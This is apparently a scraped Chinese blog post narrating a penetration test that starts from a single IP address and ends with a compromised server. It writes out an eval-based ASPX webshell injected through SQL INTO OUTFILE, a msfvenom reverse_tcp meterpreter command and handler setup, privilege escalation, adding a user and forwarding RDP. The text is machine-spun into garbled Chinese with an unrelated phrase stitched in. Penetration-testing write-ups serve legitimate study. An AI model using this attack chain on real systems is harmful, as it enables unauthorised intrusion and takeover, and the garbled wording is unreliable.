• 联系我们
  • 地址:湖北武汉三环科技园
  • 电话:159116031100
  • 传真:027-68834628
  • 邮箱:mmheng@foxmail.com
  • 当前所在位置:首页 - 音乐
  • 小白指定IP网站渗透测试实战过程讲解
  • 在本次做网站渗透测试新项目时,顾客只出示了一个IP。做为小白的我刚开始启航。
    对信息内容搜集
    Nmap扫描仪一下端口号,留意扫描仪上位端口号,通常有意外的惊喜。
    弱动态口令试着登陆。
    简易归纳一下。
    系统漏洞检测
    登陆进后台管理检测发觉2个系统软件均存有sql引入。
    还要8000端口号上的crocus系统软件中寻找一处随意压缩文件下载系统漏洞。
    原先是系统日志免费下载。点一下发觉网页页面中存有绝对路径。
    OK!!!搜集一下绝对路径。
    如今的构思是:
    在有绝对路径的前提条件下,相互配合sql引入,运用sqlmap的—sql-shell试着能够写一句话木马。
    漏洞利用
    细心看这一绝对路径。据说细心盯住它看会有神效。(笑)
    WCMS4.0这一仿佛在哪儿见过。
    没有错。就是说12055端口号,登陆后台管理
    能够运用这一后台管理的sql引入来写shell。
    sql引入点大约在检索部位。网站安全防御2020的安全加固解决办法分享
    阻拦数据文件,储存为post.txt。应用sqlmap刚开始引入。
    有引入,有dba管理权限,有绝对路径。shell一条龙从此提前准备。
    Webshell
    刚开始载入aspx一句话木马。
    select'<%@PageLanguage="Javascript"%><%eval(Request.Item["pass"]);%>'INTOOUTFILE'C://ProgramFiles(x86)//CMSServer//WCMS4.0//x.aspx'
    没问题,浏览一下。
    Nice!!!
    水果刀联接。
    操纵网络服务器
    先搜集一下该网络服务器的信息内容
    该网络服务器运作以内网,这儿挑选应用msf马反跳shell后开展端口转发。
    有关怎样出外网打造出一台metasploit。
    转化成msf马
    msfvenom-pwindows/x64/meterpreter/reverse_tcpLHOST=xx.xx.xx.xxLPORT=2333-fexe>road.exe
    xx.xx.xx.xx为内网ip网络服务器
    2333为内网ip端口号
    将转化成的msf马根据中国菜刀提交至肉食鸡。
    外网地址metasploit刚开始配备监视
    useexploit/multi/handle
    setpayload
    windows/x64/meterpreter/reverse_tcp
    setlhost127.0.0.1
    run
    简易实行几个meterpreter指令
    getuid当今管理权限
    getsystem开展提权
    rungetgui-uxxxxx-pxxxxx
    在总体目标设备上加上客户
    portfwdadd-l3389-r192.168.1.18-p3389
    将3389端口转发至当地
    端口转发联接当地的3389
    出現身份认证不正确,服务器安全做了部署
    小结
    此次新项目取得成功getshell关键运用了上位端口扫描、弱动态口令、SQL引入、压缩文件下载系统漏洞。愿每一次渗透测试都是碰到不一样的自己。